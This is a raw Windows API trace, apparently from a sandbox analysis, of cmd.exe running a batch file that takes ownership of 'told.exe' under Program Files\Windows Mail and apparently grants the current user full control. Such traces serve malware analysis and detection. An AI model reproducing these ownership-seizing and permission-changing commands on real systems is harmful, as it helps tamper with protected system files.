lpMode=0x45ee5c) returned 1 [0220.063] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.063] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x45ee88, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x45ee88*=0x2) returned 1 [0220.066] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0220.066] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0220.066] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x45ee98 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0220.066] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x45ee98 | out: _Buffer=">") returned 1 [0220.066] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.066] GetFileType (hFile=0x7) returned 0x2 [0220.067] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0220.067] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45ee60 | out: lpMode=0x45ee60) returned 1 [0220.068] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.068] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x45ee8c, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x45ee8c*=0x26) returned 1 [0220.068] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.068] GetFileType (hFile=0x7) returned 0x2 [0220.069] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0220.069] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45f0e4 | out: lpMode=0x45f0e4) returned 1 [0220.069] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.069] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x875758*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x45f110, lpReserved=0x0 | out: lpBuffer=0x875758*, lpNumberOfCharsWritten=0x45f110*=0x7) returned 1 [0220.070] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x45f11c | out: _Buffer=" /F \"C:\\Program Files\\Windows Mail\\told.exe\" ") returned 45 [0220.070] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.070] GetFileType (hFile=0x7) returned 0x2 [0220.070] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0220.070] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45f0dc | out: lpMode=0x45f0dc) returned 1 [0220.071] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.071] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2d, lpNumberOfCharsWritten=0x45f108, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x45f108*=0x2d) returned 1 [0220.073] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x45f13c | out: _Buffer="\r\n") returned 2 [0220.073] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.073] GetFileType (hFile=0x7) returned 0x2 [0220.074] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0220.074] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45f0fc | out: lpMode=0x45f0fc) returned 1 [0220.074] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.074] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x45f128, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x45f128*=0x2) returned 1 [0220.076] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0220.076] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0220.076] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0220.076] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0220.077] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0220.077] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0220.077] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0220.077] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0220.077] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0220.077] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0220.077] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0220.077] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0220.077] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0220.077] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0220.077] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0220.077] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0220.077] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0220.077] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0220.077] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0220.077] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0220.077] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0220.077] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0220.077] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0220.077] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0220.077] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0220.078] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0220.078] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0220.078] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0220.078] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0220.078] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0220.078] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0220.078] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0220.078] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0220.078] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0220.078] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0220.078] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0220.078] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0220.078] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0220.078] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0220.078] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0220.078] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0220.078] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0220.080] GetConsoleTitleW (in: lpConsoleTitle=0x45ecac, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.080] GetConsoleTitleW (in: lpConsoleTitle=0x45ea40, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.080] InitializeProcThreadAttributeList (in: lpAttributeList=0x45e8c8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x45e990 | out: lpAttributeList=0x45e8c8, lpSize=0x45e990) returned 1 [0220.080] UpdateProcThreadAttribute (in: lpAttributeList=0x45e8c8, dwFlags=0x0, Attribute=0x60001, lpValue=0x45e988, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x45e8c8, lpPreviousValue=0x0) returned 1 [0220.081] GetStartupInfoW (in: lpStartupInfo=0x45e884 | out: lpStartupInfo=0x45e884*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0220.100] CloseHandle (hObject=0x74) returned 1 [0220.100] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0220.100] GetProcessHeap () returned 0x860000 [0220.100] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x876ae0 | out: hHeap=0x860000) returned 1 [0220.101] GetEnvironmentStringsW () returned 0x875f78* [0220.101] GetProcessHeap () returned 0x860000 [0220.101] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0xb5c) returned 0x876ae0 [0220.101] FreeEnvironmentStringsW (penv=0x875f78) returned 1 [0220.101] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0225.307] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x45e864 | out: lpExitCode=0x45e864*=0x0) returned 1 [0225.307] CloseHandle (hObject=0x78) returned 1 [0225.307] _vsnwprintf (in: _Buffer=0x45e9ac, _BufferCount=0x13, _Format="%08X", _ArgList=0x45e870 | out: _Buffer="00000000") returned 8 [0225.307] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0225.307] GetProcessHeap () returned 0x860000 [0225.307] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x876ae0 | out: hHeap=0x860000) returned 1 [0225.307] GetEnvironmentStringsW () returned 0x875f78* [0225.308] GetProcessHeap () returned 0x860000 [0225.308] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0xb5c) returned 0x876ae0 [0225.308] FreeEnvironmentStringsW (penv=0x875f78) returned 1 [0225.308] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0225.308] GetProcessHeap () returned 0x860000 [0225.308] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x876ae0 | out: hHeap=0x860000) returned 1 [0225.308] GetEnvironmentStringsW () returned 0x875f78* [0225.308] GetProcessHeap () returned 0x860000 [0225.308] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0xb5c) returned 0x876ae0 [0225.308] FreeEnvironmentStringsW (penv=0x875f78) returned 1 [0225.308] GetProcessHeap () returned 0x860000 [0225.308] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x860d38 | out: hHeap=0x860000) returned 1 [0225.308] DeleteProcThreadAttributeList (in: lpAttributeList=0x45e8c8 | out: lpAttributeList=0x45e8c8) [0225.308] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.308] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0225.309] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.309] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0225.309] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.309] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0225.310] SetConsoleInputExeNameW () returned 0x1 [0225.310] GetConsoleOutputCP () returned 0x1b5 [0225.310] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0225.310] SetThreadUILanguage (LangId=0x0) returned 0x409 [0225.310] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x45f0e4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0225.311] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0225.311] _get_osfhandle (_FileHandle=3) returned 0x78 [0225.311] SetFilePointer (in: hFile=0x78, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0225.311] GetProcessHeap () returned 0x860000 [0225.311] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x874910 | out: hHeap=0x860000) returned 1 [0225.311] GetProcessHeap () returned 0x860000 [0225.311] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x8747e0 | out: hHeap=0x860000) returned 1 [0225.311] GetProcessHeap () returned 0x860000 [0225.312] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x8746b8 | out: hHeap=0x860000) returned 1 [0225.312] GetProcessHeap () returned 0x860000 [0225.312] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x8722e8 | out: hHeap=0x860000) returned 1 [0225.312] GetProcessHeap () returned 0x860000 [0225.312] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x882c08 | out: hHeap=0x860000) returned 1 [0225.312] GetProcessHeap () returned 0x860000 [0225.312] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x8744a0 | out: hHeap=0x860000) returned 1 [0225.312] GetProcessHeap () returned 0x860000 [0225.312] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x874420 | out: hHeap=0x860000) returned 1 [0225.312] GetProcessHeap () returned 0x860000 [0225.312] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x8742f0 | out: hHeap=0x860000) returned 1 [0225.312] GetProcessHeap () returned 0x860000 [0225.312] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x8741c8 | out: hHeap=0x860000) returned 1 [0225.312] GetProcessHeap () returned 0x860000 [0225.312] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x874158 | out: hHeap=0x860000) returned 1 [0225.312] GetProcessHeap () returned 0x860000 [0225.312] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x8611f0 | out: hHeap=0x860000) returned 1 [0225.312] GetProcessHeap () returned 0x860000 [0225.312] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x875750 | out: hHeap=0x860000) returned 1 [0225.313] GetProcessHeap () returned 0x860000 [0225.313] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x861190 | out: hHeap=0x860000) returned 1 [0225.313] _get_osfhandle (_FileHandle=3) returned 0x78 [0225.313] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0225.313] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x45f0c8, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x45f0c8*=0xb3, lpOverlapped=0x0) returned 1 [0225.314] SetFilePointer (in: hFile=0x78, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0225.314] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=16, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="set FN=\"%~nx1\"\r\nUSERNAME%:F /C\r\n") returned 16 [0225.315] _get_osfhandle (_FileHandle=3) returned 0x78 [0225.315] GetFileType (hFile=0x78) returned 0x1 [0225.315] _get_osfhandle (_FileHandle=3) returned 0x78 [0225.315] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0225.315] GetProcessHeap () returned 0x860000 [0225.315] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x400a) returned 0x884af0 [0225.316] GetProcessHeap () returned 0x860000 [0225.316] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x58) returned 0x861190 [0225.316] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Mail\\told.exe", nBufferLength=0x208, lpBuffer=0x45e858, lpFilePart=0x45e850 | out: lpBuffer="C:\\Program Files\\Windows Mail\\told.exe", lpFilePart=0x45e850*="told.exe") returned 0x26 [0225.316] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0x45e56c | out: lpFindFileData=0x45e56c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x41dc500, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x41dc500, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 0x8611f0 [0225.316] FindClose (in: hFindFile=0x8611f0 | out: hFindFile=0x8611f0) returned 1 [0225.316] _wcsnicmp (_String1="PROGRA~1", _String2="Program Files", _MaxCount=0xd) returned 17 [0225.316] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Mail", lpFindFileData=0x45e56c | out: lpFindFileData=0x45e56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xddb7c380, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xddb7c380, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Mail", cAlternateFileName="WINDOW~1")) returned 0x8611f0 [0225.316] FindClose (in: hFindFile=0x8611f0 | out: hFindFile=0x8611f0) returned 1 [0225.316] _wcsnicmp (_String1="WINDOW~1", _String2="Windows Mail", _MaxCount=0xc) returned 11 [0225.317] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Mail\\told.exe", lpFindFileData=0x45e56c | out: lpFindFileData=0x45e56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa071ff20, ftCreationTime.dwHighDateTime=0x1d597c3, ftLastAccessTime.dwLowDateTime=0xf0974e50, ftLastAccessTime.dwHighDateTime=0x1d5ae67, ftLastWriteTime.dwLowDateTime=0xf0974e50, ftLastWriteTime.dwHighDateTime=0x1d5ae67, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="told.exe", cAlternateFileName="")) returned 0x8611f0 [0225.317] FindClose (in: hFindFile=0x8611f0 | out: hFindFile=0x8611f0) returned 1 [0225.317] GetProcessHeap () returned 0x860000 [0225.317] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x1a) returned 0x875830 [0225.317] GetProcessHeap () returned 0x860000 [0225.317] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x884af0 | out: hHeap=0x860000) returned 1 [0225.320] _tell (_FileHandle=3) returned 63 [0225.320] _close (_FileHandle=3) returned 0 [0225.320] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x45ee9c | out: _Buffer="\r\n") returned 2 [0225.320] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.320] GetFileType (hFile=0x7) returned 0x2 [0225.320] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0225.320] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45ee5c | out: lpMode=0x45ee5c) returned 1 [0225.321] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.321] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x45ee88, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x45ee88*=0x2) returned 1 [0226.009] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0226.009] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0226.009] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x45ee98 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0226.010] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x45ee98 | out: _Buffer=">") returned 1 [0226.010] _get_osfhandle (_FileHandle=1) returned 0x7 [0226.010] GetFileType (hFile=0x7) returned 0x2 [0228.837] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.837] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45ee60 | out: lpMode=0x45ee60) returned 1 [0228.837] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.837] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x45ee8c, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x45ee8c*=0x26) returned 1 [0228.838] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.838] GetFileType (hFile=0x7) returned 0x2 [0228.838] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.838] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45f0e4 | out: lpMode=0x45f0e4) returned 1 [0228.838] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.838] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x860d40*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x45f110, lpReserved=0x0 | out: lpBuffer=0x860d40*, lpNumberOfCharsWritten=0x45f110*=0x3) returned 1 [0228.839] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x45f11c | out: _Buffer=" FN=\"told.exe\" ") returned 15 [0228.839] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.839] GetFileType (hFile=0x7) returned 0x2 [0228.839] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.839] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45f0dc | out: lpMode=0x45f0dc) returned 1 [0228.839] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.839] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x45f108, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x45f108*=0xf) returned 1 [0228.840] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x45f13c | out: _Buffer="\r\n") returned 2 [0228.840] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.840] GetFileType (hFile=0x7) returned 0x2 [0228.840] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.840] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45f0fc | out: lpMode=0x45f0fc) returned 1 [0228.840] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.840] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x45f128, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x45f128*=0x2) returned 1 [0228.841] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0228.841] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0228.841] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0228.841] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0228.841] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0228.841] _wcsicmp (_String1="set", _String2="CD") returned 16 [0228.841] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0228.841] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0228.841] _wcsicmp (_String1="set", _String2="REN") returned 1 [0228.841] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0228.841] _wcsicmp (_String1="set", _String2="SET") returned 0 [0228.841] GetConsoleTitleW (in: lpConsoleTitle=0x45ecac, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0228.842] wcsncmp (_String1="FN", _String2="/", _MaxCount=0x4) returned 23 [0228.842] SetEnvironmentVariableW (lpName="FN", lpValue="\"told.exe\"") returned 1 [0228.842] GetProcessHeap () returned 0x860000 [0228.842] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x876ae0 | out: hHeap=0x860000) returned 1 [0228.842] GetEnvironmentStringsW () returned 0x874be8* [0228.842] GetProcessHeap () returned 0x860000 [0228.842] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0xb78) returned 0x875f78 [0228.842] FreeEnvironmentStringsW (penv=0x874be8) returned 1 [0228.842] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.842] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0228.843] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.843] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0228.843] _get_osfhandle (_FileHandle=0) returned 0x3 [0228.843] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0228.843] SetConsoleInputExeNameW () returned 0x1 [0228.843] GetConsoleOutputCP () returned 0x1b5 [0228.844] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0228.844] SetThreadUILanguage (LangId=0x0) returned 0x409 [0228.844] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x45f0e4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0228.845] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0228.845] _get_osfhandle (_FileHandle=3) returned 0x78 [0228.845] SetFilePointer (in: hFile=0x78, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0228.845] GetProcessHeap () returned 0x860000 [0228.845] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x861280 | out: hHeap=0x860000) returned 1 [0228.845] GetProcessHeap () returned 0x860000 [0228.845] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x874158 | out: hHeap=0x860000) returned 1 [0228.845] GetProcessHeap () returned 0x860000 [0228.845] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x861250 | out: hHeap=0x860000) returned 1 [0228.845] GetProcessHeap () returned 0x860000 [0228.845] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x860d38 | out: hHeap=0x860000) returned 1 [0228.845] GetProcessHeap () returned 0x860000 [0228.845] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x8611f0 | out: hHeap=0x860000) returned 1 [0228.845] GetProcessHeap () returned 0x860000 [0228.845] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x875830 | out: hHeap=0x860000) returned 1 [0228.845] GetProcessHeap () returned 0x860000 [0228.845] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x861190 | out: hHeap=0x860000) returned 1 [0228.845] _get_osfhandle (_FileHandle=3) returned 0x78 [0228.845] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0228.845] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x45f0c8, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x45f0c8*=0xa3, lpOverlapped=0x0) returned 1 [0228.845] SetFilePointer (in: hFile=0x78, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0228.845] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=15, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="cd /d \"%~dp0\"\r\n\nUSERNAME%:F /C\r\n") returned 15 [0228.846] _get_osfhandle (_FileHandle=3) returned 0x78 [0228.846] GetFileType (hFile=0x78) returned 0x1 [0228.846] _get_osfhandle (_FileHandle=3) returned 0x78 [0228.846] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0228.846] GetProcessHeap () returned 0x860000 [0228.846] RtlAllocateHeap 